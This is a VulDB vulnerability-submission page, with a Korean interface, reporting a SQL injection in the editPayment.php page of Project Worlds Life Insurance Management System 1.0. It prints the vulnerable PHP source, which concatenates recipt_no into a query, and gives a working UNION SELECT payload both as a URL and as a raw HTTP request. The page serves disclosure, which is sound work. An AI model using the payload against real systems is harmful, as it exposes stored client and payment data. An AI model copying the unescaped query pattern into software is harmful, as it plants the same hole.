제출 #435410: Project Worlds Life Insurance Management System v1.0 SQL Injection정보

제목	Project Worlds Life Insurance Management System v1.0 SQL Injection
설명	# SQL Injection vulnerability was discovered in Life Insurance Management System(editPayment.php) Official Website: https://projectworlds.in/life-insurance-management-system-in-php/ Version: 1.0 Related Code file: /lims/editPayment.php dbname=lims Payload: /lims/editPayment.php?recipt_no=-1511988103_361528786%27%20union%20select%201,database(),3,4,5,6,7--+ <hr> ```php <?php include'connection.php'; $id = ""; if($_SERVER["REQUEST_METHOD"] == "GET"){ $recipt_no = $_GET["recipt_no"]; } $sql = "SELECT recipt_no, client_id, month, amount, due, fine, agent_id from payment where recipt_no='$recipt_no'"; $result = $conn->query($sql); echo "<div>\n"; echo '<form action="updatePayment.php" method="post">'; while($row = $result->fetch_assoc()) { echo "<label for=\"fname\">RECIPT NO</label>"; echo "<input type=\"text\" recipt_no=\"fname\" name=\"recipt_no\" placeholder=\"Your recpit no..\" value=\"$row[recipt_no]\">"; echo "<label for=\"fname\">CLIENT ID</label>"; echo "<input type=\"text\" recipt_no=\"fname\" name=\"client_id\" placeholder=\"Client Id..\" value=\"$row[client_id]\">"; echo "<label for=\"fname\">MONTH</label>"; echo "<input type=\"text\" recipt_no=\"fname\" name=\"month\" placeholder=\"Month..\" value=\"$row[month]\">"; echo "<label for=\"fname\">AMOUNT</label>"; echo "<input type=\"text\" recipt_no=\"fname\" name=\"amount\" placeholder=\"Amount..\" value=\"$row[amount]\">"; echo "<label for=\"fname\">DUE</label>"; echo "<input type=\"text\" recipt_no=\"fname\" name=\"due\" placeholder=\"Your Due..\" value=\"$row[due]\">"; echo "<label for=\"fname\">FINE</label>"; echo "<input type=\"text\" recipt_no=\"fname\" name=\"fine\" placeholder=\"Fine..\" value=\"$row[fine]\">"; echo "<label for=\"fname\">AGENT ID</label>"; echo "<input type=\"text\" recipt_no=\"fname\" name=\"agent_id\" placeholder=\"Agent Id..\" value=\"$row[agent_id]\">"; } echo "<input type=\"submit\" value=\"UPDATE\">"; echo "</form>\n"; echo "<a href='deletePayment.php?recipt_no=".$recipt_no."'>Delete Payment</a>"; echo "</div>\n"; echo "\n"; ?> ``` The id variable is directly inserted into the SQL query without any escaping or parameterization. An attacker could inject malicious SQL code by manipulating the id field. in (line number 88-135 of ) Injection parameter: recipt_no ``` GET /lims/editPayment.php?recipt_no=-1511988103_361528786%27%20union%20select%201,database(),3,4,5,6,7--+ HTTP/1.1 Host: 192.168.1.18 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Cookie: PHPSESSID=m36in4a8ui1q6k23afkenkqivk Connection: close ``` ![image](https://github.com/user-attachments/assets/84ad2cc6-395f-4204-862b-9e58c4458b47)
원천	⚠️ https://github.com/peteryang520/Cve-report/blob/main/SQLi-1.md
사용자	Hantao Yang (UID 76989)
제출	2024. 11. 01. AM 10:13 (2 연령 ago)
모더레이션	2024. 11. 02. PM 07:09 (1 day later)
상태	수락
VulDB 항목	282903 [Project Worlds Life Insurance Management System 1.0 /editPayment.php recipt_no SQL 주입]
포인트들	20

◂ 이전 개요 다음 ▸

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!